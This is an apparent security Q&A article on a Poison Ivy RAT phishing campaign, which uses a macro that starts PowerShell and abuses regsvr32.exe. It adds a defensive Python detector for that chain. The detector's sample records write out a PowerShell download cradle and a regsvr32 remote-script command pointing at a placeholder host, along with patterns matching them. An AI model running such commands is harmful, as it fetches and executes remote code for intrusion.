Q
Poison Ivy RAT: What new delivery techniques are attackers using?

A revamped Poison Ivy RAT campaign has been using new evasion and distribution techniques. Expert Nick Lewis explains the new attack methods that enterprises should look out for.

FireEye researchers found a Poison Ivy RAT campaign using new social engineering, evasion and distribution techniques to spread the malware, which is capable of key logging, password theft, and taking screen and video captures. What new attack and delivery methods should enterprises be on the lookout for with this remote access Trojan?

Every victim of a successful attack wants to believe that the most sophisticated techniques were used to compromise their systems. The truth is that vulnerabilities sometimes remain on systems for long periods, and well-known security recommendations go unapplied for many different reasons, leaving attackers with easy access.

This isn't to say the attack was the victim's fault -- this is just the sad state of information security. While there have been many security improvements on mobile devices and advances on the desktop, an attacker can often simply buy a zero-day exploit to achieve their goals.

FireEye researchers wrote about an attack using the Poison Ivy RAT, where a phishing email is used to get the victim to open a malicious Word document and execute a macro. The emails were targeted at individuals working in the Mongolian government and claimed the documents contained webmail login instructions or information on a state law proposal.

The macro runs a PowerShell script that downloads the malware from the internet, along with decoy documents to divert the victim's attention. The script writes its payload to the registry and, taking advantage of a weakness in AppLocker, uses regsvr32.exe to install fileless malware on the endpoint.

Since PowerShell's release more than 10 years ago, some have expected it to be used in malware attacks. Microsoft publishes recommendations for blocking malicious PowerShell scripts that address attacks like this one. Enterprises should also have policies or plans to defend themselves and their individual users against phishing attacks like the one used to spread this RAT.
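As an added example that is not part of the original article, the following Python sketch applies the process-chain checks a defender would want for this delivery path (an Office parent spawning PowerShell or regsvr32.exe, a PowerShell download cradle or encoded command, a URL handed to regsvr32.exe) to constructed Sysmon-style process-creation records; the record layout, file paths and URLs are assumptions.

```python
import re
# Constructed, Sysmon-style process-creation records "ParentImage|Image|CommandLine";
# the field layout is assumed, and paths and URLs are placeholders, not from a real incident.
SAMPLE_EVENTS = [
    r"C:\Windows\explorer.exe|C:\Program Files\Microsoft Office\WINWORD.EXE|WINWORD.EXE /n proposal.docx",
    r"C:\Program Files\Microsoft Office\WINWORD.EXE|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|"
    r"powershell.exe -w hidden -nop -c (New-Object Net.WebClient).DownloadString('http://example.invalid/a')",
    r"C:\Program Files\Microsoft Office\WINWORD.EXE|C:\Windows\System32\regsvr32.exe|regsvr32.exe /s /i:http://example.invalid/x.sct",
    r"C:\Windows\explorer.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -File C:\scripts\backup.ps1",
    r"C:\Windows\System32\msiexec.exe|C:\Windows\System32\regsvr32.exe|regsvr32.exe /s C:\Program Files\Vendor\lib.dll",
]
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "regsvr32.exe", "mshta.exe", "wscript.exe", "cscript.exe"}
PS_DOWNLOAD = re.compile(r"downloadstring|downloadfile|invoke-webrequest|net\.webclient|\biwr\b", re.I)
PS_ENCODED = re.compile(r"(^|\s)-e(c|nc|ncodedcommand)?\s", re.I)
URL = re.compile(r"https?://", re.I)

def basename(path):  # lower-cased file name of a Windows path, either slash style
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(parent_image, image, command_line):
    """Return the reasons one event matches the macro -> script-host delivery chain."""
    parent, child, cmd = basename(parent_image), basename(image), command_line
    reasons = []
    if parent in OFFICE_PARENTS and child in SCRIPT_HOSTS:
        reasons.append(f"office-spawned-script-host:{parent}->{child}")
    if child == "regsvr32.exe" and URL.search(cmd):
        reasons.append("regsvr32-remote-url")  # registration input fetched from the internet
    if child == "powershell.exe":
        if PS_DOWNLOAD.search(cmd):
            reasons.append("powershell-download-cradle")
        if PS_ENCODED.search(cmd):
            reasons.append("powershell-encoded-command")
    return reasons

def scan(records):
    """Return (record_no, reasons) for every record that triggers at least one check."""
    hits = []
    for n, line in enumerate(records, 1):
        parts = line.split("|", 2)
        if len(parts) != 3:  # malformed record: skip it rather than abort the whole scan
            continue
        reasons = classify(*parts)
        if reasons:
            hits.append((n, reasons))
    return hits

if __name__ == "__main__":
    for n, reasons in scan(SAMPLE_EVENTS):
        print(f"record {n}: {', '.join(reasons)}")
```

Only the two records spawned from WINWORD.EXE are flagged; the administrator's PowerShell script and the installer's local DLL registration pass through, which is the distinction an alert on bare process names alone would miss.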

Next Steps

Learn how a remote access Trojan like GlassRAT remains undetected

Find out how the Trochilus RAT evades sandboxing to conduct cyberespionage

Read about how to handle phishing attempts on your employees

This was last published in July 2017
